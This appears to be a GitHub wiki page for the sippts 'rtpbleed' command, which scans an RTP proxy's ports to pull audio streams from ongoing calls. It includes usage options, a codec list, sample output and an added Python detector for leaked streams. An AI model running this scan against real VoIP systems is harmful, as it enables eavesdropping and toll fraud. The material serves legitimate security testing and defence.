Command rtpbleed - Pepelux/sippts GitHub Wiki
The RTP Bleed bug is a serious vulnerability in a number of RTP proxies. It allows malicious users to inject and receive RTP streams of ongoing calls without needing to be positioned as man-in-the-middle. This may lead to eavesdropping on audio calls, impersonation, and possibly toll fraud through redirection of ongoing calls.
More info about the vulnerability: https://www.rtpbleed.com/
Usage
$ sippts rtpbleed -h
Payloads
--------
0 PCMU (audio)
3 GSM (audio)
4 G723 (audio)
5 DVI4 (audio)
6 DVI4 (audio)
7 LPC (audio)
8 PCMA (audio)
9 G722 (audio)
10 L16 (audio)
11 L16 (audio)
12 QCELP (audio)
13 CN (audio)
14 MPA (audio)
15 G728 (audio)
16 DVI4 (audio)
17 DVI4 (audio)
18 G729 (audio)
25 CELLB (video)
26 JPEG (video)
28 nv (video)
31 H261 (video)
32 MPV (video)
33 MP2T (audio/video)
34 H263 (video)
Target:
-i IP Target IP address
Other options:
-s PORT Start port of the host (default: 10000)
-e PORT End port of the host (default: 20000)
-l LOOPS Number of times to probe the port ranges on the target(s) (default: 4)
-p PAYLOAD Codec payload (default: 0)
-d DELAY Delay for timeout in microseconds (default: 1)
-h, --help Show this help
Example
$ sippts rtpbleed -i 192.168.1.1
[!] Target IP: 192.168.1.1
[!] Port range: 10000-20000
[!] Payload type: 0
[!] Number of tries per port: 4
[!] Delay between tries: 50 microseconds
[+] Checking port: 10070 with payload type 0 (Seq number: 1)
[+] received 172 bytes from target port 10070 - loop 1
[-] SSRC: 55954f70 - Timestamp: 1124640 - Seq number: 26239
[+] Checking port: 10070 with payload type 0 (Seq number: 3)
[+] received 172 bytes from target port 10070 - loop 3
[-] SSRC: 55954f70 - Timestamp: 1125440 - Seq number: 26244
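A defender-side reading of the output above, as an added example that is not part of sippts: it decodes the fixed RTP header (the SSRC, timestamp and sequence number the tool prints) and flags any SSRC that a media proxy sends to a destination that was not negotiated in SDP. The `make_rtp` helper, the `EGRESS` and `NEGOTIATED` names, and all addresses and ports are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict

def parse_rtp_header(packet: bytes) -> dict:
    """Decode the 12-byte fixed RTP header (RFC 3550, section 5.1)."""
    if len(packet) < 12:
        raise ValueError("shorter than the fixed RTP header")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", packet[:12])
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    header_len = 12 + 4 * (b0 & 0x0F)  # CSRC entries follow the fixed header
    if header_len > len(packet):
        raise ValueError("CSRC count exceeds packet length")
    return {"payload_type": b1 & 0x7F, "seq": seq, "timestamp": ts,
            "ssrc": f"{ssrc:08x}", "payload_len": len(packet) - header_len}

def find_leaked_streams(egress, negotiated):
    """Map SSRC -> destinations that received it without being negotiated.

    egress: (dst_ip, dst_port, packet) tuples sent by the media proxy.
    negotiated: set of (ip, port) media peers taken from SDP signalling.
    """
    leaks = defaultdict(set)
    for dst_ip, dst_port, packet in egress:
        try:
            hdr = parse_rtp_header(packet)
        except ValueError:
            continue  # not RTP, skip
        if (dst_ip, dst_port) not in negotiated:
            leaks[hdr["ssrc"]].add((dst_ip, dst_port))
    return {ssrc: sorted(dsts) for ssrc, dsts in leaks.items()}

def make_rtp(seq, ts, ssrc=0x55954F70, pt=0, payload=b"\xff" * 160):
    """Build a constructed RTP packet (V=2, no padding, extension or CSRC)."""
    return struct.pack("!BBHII", 0x80, pt, seq, ts, ssrc) + payload

# Constructed sample: header values from the example output, addresses made up.
NEGOTIATED = {("10.0.0.5", 40000)}
EGRESS = [
    ("10.0.0.5", 40000, make_rtp(26238, 1124480)),
    ("192.168.1.50", 51000, make_rtp(26239, 1124640)),
    ("10.0.0.5", 40000, make_rtp(26240, 1124800)),
    ("192.168.1.50", 51000, make_rtp(26244, 1125440)),
    ("10.0.0.5", 40000, b"\x00\x01"),  # non-RTP noise
]

if __name__ == "__main__":
    print(parse_rtp_header(EGRESS[1][2]))
    print(find_leaked_streams(EGRESS, NEGOTIATED))
```

The constructed packets are 172 bytes each (12-byte header plus 160 bytes of PCMU), matching the size reported in the output above.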